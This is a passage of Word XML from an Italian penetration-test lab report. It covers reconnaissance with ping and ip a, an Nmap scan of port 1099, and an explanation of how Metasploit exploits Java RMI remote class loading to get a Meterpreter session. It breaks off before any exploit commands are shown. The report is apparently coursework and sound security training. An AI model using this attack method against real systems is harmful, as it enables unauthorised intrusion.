        <w:t>L'attività è stata svolta seguendo le fasi canoniche di un penetration test, riconducibili al modello PTES (Penetration Testing Execution Standard). Le fasi effettivamente applicate in questo esercizio sono riepilogate nella tabella seguente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9000" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:bottom w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:right w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideH w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
          <w:insideV w:val="single" w:color="c9c0e8" w:sz="2" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="5200"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000002D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000002E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attività svolta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000002F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Strumento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000030">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Ricognizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000031">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Verifica degli indirizzi IP e della connettività tra le due macchine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000032">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ip a, ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000033">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000034">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Individuazione della porta aperta e identificazione del servizio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000035">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000036">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000037">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Configurazione e lancio del modulo Metasploit contro Java RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000038">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000039">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. Post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="5200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000003A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Raccolta delle evidenze richieste sulla macchina compromessa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000003B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meterpreter / shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000003C">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3. Fase 1 — Ricognizione e verifica di rete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il primo passo consiste nel verificare che la macchina attaccante disponga dell'indirizzo IP richiesto dalla traccia e che sia in grado di raggiungere la macchina vittima. Sulla macchina Kali si eseguono i comandi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f3f1fa"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping -c 3 192.168.11.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'output conferma che l'interfaccia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> della macchina Kali è configurata con l'indirizzo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.111/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, esattamente come richiesto. Il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> verso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.112</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restituisce risposta con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0% di pacchetti persi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e TTL pari a 64: le due macchine si trovano sullo stesso segmento di rete e comunicano correttamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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20"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 3 — Verifica dell'indirizzo IP della macchina attaccante (192.168.11.111) e test di connettività verso la vittima (192.168.11.112): 3 pacchetti trasmessi, 3 ricevuti, 0% di perdita.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000043">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000044">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4. Fase 2 — Scanning e identificazione del servizio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confermata la connettività, si procede con una scansione mirata della porta 1099 sulla macchina vittima, utilizzando l'opzione di service detection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) di Nmap per identificare il software in ascolto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000046">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="f3f1fa"/>
        <w:spacing w:before="60" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2b2153"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap -p 1099 -sV 192.168.11.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il risultato conferma che la porta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1099/TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> è </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="1b7f3b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aperta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e ospita il servizio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java-rmi (GNU Classpath grmiregistry)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Si tratta esattamente del registro RMI vulnerabile che la traccia richiede di sfruttare. L'host risulta attivo con latenza minima, a ulteriore conferma della corretta raggiungibilità del target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000049">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 4 — Scansione Nmap del target 192.168.11.112: la porta 1099/TCP risulta aperta ed espone il servizio Java RMI (grmiregistry), confermando la superficie di attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.1 Nota sulla vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il servizio Java RMI Registry, quando configurato con class loading remoto abilitato, consente a un client di far caricare al server una classe Java arbitraria ospitata su un endpoint HTTP controllato dall'attaccante. Metasploit sfrutta questo meccanismo: espone un piccolo server HTTP che serve un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>payload JAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> malevolo, induce il registro RMI a scaricarlo ed eseguirlo, ottenendo così esecuzione di codice remoto e, di conseguenza, una sessione Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004C">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5. Fase 3 — Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.1 Configurazione del modulo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004F">
      <w:pPr>
